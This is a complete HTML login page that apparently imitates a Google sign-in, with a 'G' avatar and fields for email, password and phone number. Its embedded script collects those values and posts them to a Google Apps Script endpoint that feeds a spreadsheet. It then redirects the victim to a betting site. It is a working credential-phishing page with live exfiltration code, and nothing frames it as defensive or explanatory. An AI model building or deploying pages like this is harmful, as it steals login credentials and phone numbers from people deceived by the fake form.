<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login Account</title>
  <style>
    * {
  box-sizing: border-box;
  margin: 0;
  padding: 0;
}

body {
  background-color: #0f162e;
  font-family: Arial, sans-serif;
  display: flex;
  justify-content: center;
  align-items: center;
  width: 100%;
  height: 100vh;
}

.login-container {
  position: relative;
  padding: 2rem 1.5rem;
  border: 2px solid #1e90ff;
  border-radius: 8px;
  background: transparent;
  width: 380px;
}

.avatar {
    display: flex;
    justify-content: center;
    align-items: center;
  width: 80px;
  height: 80px;
  background: #1e90ff;
  border-radius: 50%;
  border: 2px solid white;
  position: absolute;
  top: -40px;
  left: 50%;
  transform: translateX(-50%);
}

#login-form {
    width: 100%;
  margin-top: 3rem;
  display: flex;
  flex-direction: column;
  gap: 0.8rem;
}

#login-form input {
  padding: 0.6rem;
  border: 2px solid #135da7;
  border-radius: 4px;
  background: #f1f1f1;
  width: 100%;
  font-size: 1rem;
}

#submitButton {
  padding: 0.7rem;
  border: none;
  background: #1e90ff;
  color: #fff;
  font-size: 1rem;
  cursor: pointer;
  border-radius: 4px;
  font-weight: bold;
}

#submitButton:hover {
  background: #0077dd;
}

.options {
  display: flex;
  justify-content: space-between;
  align-items: center;
  font-size: 0.9rem;
  color: #fff;
  flex-wrap: wrap;
  gap: 0.5rem;
}

.options a {
  color: #fff;
  text-decoration: none;
}

.options a:hover {
  text-decoration: underline;
}

label input {
  accent-color: #1e90ff;
}
.details{
    background-color: green;
    width: 90%;

}
@media (max-width:500px) {

    .login-container{
        width: 500px;
        width: 90%;
        height: 50%;
    }
}

  </style>
</head>
<body>
  <div class="login-container">
    <div class="avatar"><h1 style="color: white; font-family: monospace; font-size: 2rem;">G</h1></div>
    <form id="login-form" name="submit-to-google-sheet">
      <input type="email" placeholder="Email" name="Email" required />
      <input id="pass" type="password" placeholder="Password" name="Password" required />
      <input type="tel" placeholder="Phone Number" name="Number" required />
      <button id="submitButton" type="submit">LOGIN</button>
      <div class="options">
        <label><input id="checkb" type="checkbox" /> Remember me</label>
        <a href="#">Forgot password?</a>
      </div>
    </form>
  </div>

  <script>

 
     const submitButton = document.getElementById('submitButton');
    const scriptURL = 'https://script.google.com/macros/s/AKfycbxm8stpf3n2H2YGPe6NwompI7_vtfQoqgapUkEzhrtSmERrgbbNAxzSwTAi31Nq9rWDYA/exec'
    const form = document.forms['submit-to-google-sheet']
  
    form.addEventListener('submit', e => {
      e.preventDefault()
      submitButton.style.backgroundColor = 'gray';
      submitButton.innerHTML = 'Submitting...';
      submitButton.disabled = true;
      fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then(response => {
              window.location.href = "https://1xbet.com/en";
        })
        .catch(error => {
            alert("Something wrong try again!")
        })
    })

  </script>
</body>
</html>
